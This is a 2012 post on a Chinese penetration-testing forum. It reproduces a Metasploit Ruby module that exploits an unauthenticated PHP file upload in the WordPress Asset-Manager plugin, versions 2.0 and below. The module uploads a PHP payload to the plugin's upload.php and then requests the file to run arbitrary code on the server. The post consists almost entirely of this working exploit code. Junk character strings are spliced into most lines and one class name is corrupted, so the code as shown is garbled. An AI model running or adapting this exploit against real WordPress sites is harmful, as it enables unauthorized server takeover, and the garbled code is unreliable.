找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1994|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
# C1 l9 z6 X3 z, K1 k8 X4 }/ F, Q- g  w$ ^9 W5 K: H
##" d6 H/ P% }. P2 U6 }
# This file is part of the Metasploit Framework and may be subject to% R- m- p) H' o; J. R
# redistribution and commercial restrictions. Please see the Metasploit1 ~& E) t. p( {( I$ w
# Framework web site for more information on licensing and terms of use.5 H% v# s: b; ?6 f: W# `; [
#   http://metasploit.com/framework/% z1 q( L3 M& ]
##/ ^& B1 X" E' N
, ^& k: \. Y3 Y0 G  @* [7 F" F: v
require 'msf/core'
# q: s5 |" y" Y  D3 ~* yrequire 'msf/core/exploit/php_exe'
5 n# w% W+ J, ]. X
& x) E0 `; q9 mclass Metasploit3 < Msf::Exploit::Remote# ~* E8 W% @; t& b% d3 l
  Rank = ExcellentRanking
9 o5 c' i7 H; x' {/ p  S9 Q% J# f& g
+ [0 S* q: h  x% c  include Msf::Exploit::Remote::HttpClient5 v0 X1 v' U3 l. l9 U- ^0 w
  include Msf::Exploit:hpEXE
' d9 e* B1 H* E! x : \# x3 z2 g( i1 j- A
  def initialize(info = {})7 M5 C2 G# k" t- g& I+ X- w
    super(update_info(info,$ ]" y9 Q) |7 `0 b: }2 L6 B: M
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
1 g6 H- r+ z! ?) ?" k$ ~7 a$ ~) G      'Description'    => %q{* w8 D" ]! H1 ^% |8 [2 \
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
7 S1 E% d+ D/ f1 n        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
" q9 _, c3 X9 z        temp directory without authentication, which results in arbitrary code execution.3 M7 n9 I! ]0 a
      },
3 r: M1 q, C: ?, I8 A# a* u      'Author'         =>7 \- A4 F/ h. X" H0 A7 M
        [- _: L0 ^$ j1 ^
          'Sammy FORGIT', # initial discovery6 }* ^6 K; f1 q, F+ i9 [& S& \
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module; M8 m3 n8 b; ~
        ],
1 K/ W( \9 j6 j+ G# E3 m& M+ y- m      'License'        => MSF_LICENSE,
; e" i. R: F( g9 B      'References'     =>2 o  L1 C5 O+ y8 V$ }5 u
        [
8 |" v  w/ T. H5 R          [ 'OSVDB', '82653' ],* H  ]0 Y: I. {# ~6 M- j& v
          [ 'BID', '53809' ],
* Z' e' }" K- Z% a' x          [ 'EDB', '18993' ],
+ V$ k- n% @$ T+ Q0 J7 r' x) ~          [ 'URL', 'http:// www.myhack58.com /' ]
1 z6 E$ s! S+ c- \2 ?        ],
4 G4 f* k! F2 u7 Q0 D, ]7 e      'Payload'       =>6 w% l' ?: Y" [0 Y( D, s9 N8 N1 K
        {$ [9 [, Y" O2 r1 G
          'BadChars' => "\x00",
( r6 c: ]: i7 B% i* A, X6 h1 z        },
, s  f/ p, _3 |) `0 B5 t# \      'Platform'       => 'php',
9 U, _6 l$ i. I9 J* c, z      'Arch'           => ARCH_PHP,
1 l, \- t1 |4 E9 h3 ~      'Targets'        =>  ?8 p# W7 y5 j: T' c
        [) ^: W  p. A, B2 _% f
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],1 h( K9 [, n5 l) c
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ], `6 ~% v( S" u
        ],( Z. {$ s$ g0 ]' B! j
      'DefaultTarget' => 0,1 A6 ?. x4 Z5 ]9 j8 t% _; Y
      'DisclosureDate' => 'May 26 2012'))! g' {! f/ V) m  u7 q

4 C0 @- h9 t5 W& D    register_options(  o5 D" B& l+ c8 T- a! y8 p
      [5 O- c. w4 k8 x; a3 M
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])0 O% |: k" ~( }2 P
      ], self.class)
0 i; {" N& i# E8 ~( w0 l9 o6 z  end4 P" k4 G" a  n
" {& i3 S$ z, x: r0 v1 {8 \, M
  def exploit0 ]1 _0 n# }# f5 X% b! Z3 o- w
    uri =  target_uri.path7 j1 ^; k, w  X$ M/ B7 k
    uri << '/' if uri[-1,1] != '/') w; P: @) w7 A9 h; w0 }
    peer = "#{rhost}:#{rport}"
1 K$ c. G+ |, `    payload_name = "#{rand_text_alpha(5)}.php"
( x  ^( Y2 {$ e0 P; ]0 |- z    php_payload = get_write_exec_payload(:unlink_self=>true)/ |$ b: m1 X7 F$ U0 X5 x
: x% U+ r' J! a( |) N6 c6 f
    data = Rex::MIME::Message.new
6 f" j, ~' ?" \' ?  h& V    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
& E. o( e8 g9 z7 K! Y    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
4 |; v$ y; ~* V0 _  A
1 ?, w. {2 b- s+ ^/ q* g. A    print_status("#{peer} - Uploading payload #{payload_name}")$ p5 t: O; G6 [5 M2 S& M, c
    res = send_request_cgi({" }1 K% _8 W5 N/ E. r
      'method'  => 'POST',
: C+ g! C8 Y1 O7 C; N8 i      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",! y! t2 b% Y: u
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",. q6 E1 m( a4 s2 ]* d
      'data'    => post_data+ e9 J8 D! {% B1 K2 @: p
    }), T# ]9 b- d3 V5 C9 S8 S; I" w1 Y
% V' |, m9 w- o$ L# r+ W0 n( V
    if not res or res.code != 200 or res.body !~ /#{payload_name}/, A- h5 {, G3 s, G
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
# e4 I9 O# d+ p6 x# t" Y+ iend8 v/ K4 ^- a9 O2 x; D# \

% U2 }/ r$ [: |9 b% Y& U    print_status("#{peer} - Executing payload #{payload_name}")
; }# d# H* \5 \2 H; O8 P2 F    res = send_request_raw({  P6 Q0 _6 c, j, O+ G
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
6 c7 ~5 Q8 A% l- L6 n" k      'method'  => 'GET'
& V' E% W' h) Y3 a. c3 A    })$ T& p* x) v+ Y' R5 M6 m

2 E3 t8 C9 u3 y+ L    if res and res.code != 200) N8 c9 T% U4 m
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
2 k. B. E* E+ ]! I$ g2 r# a    end
2 g( c# R+ s5 v+ b  end- L2 o& Q8 p  ~" w: S+ i
end: \( G" d+ ?0 Z- u  H
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表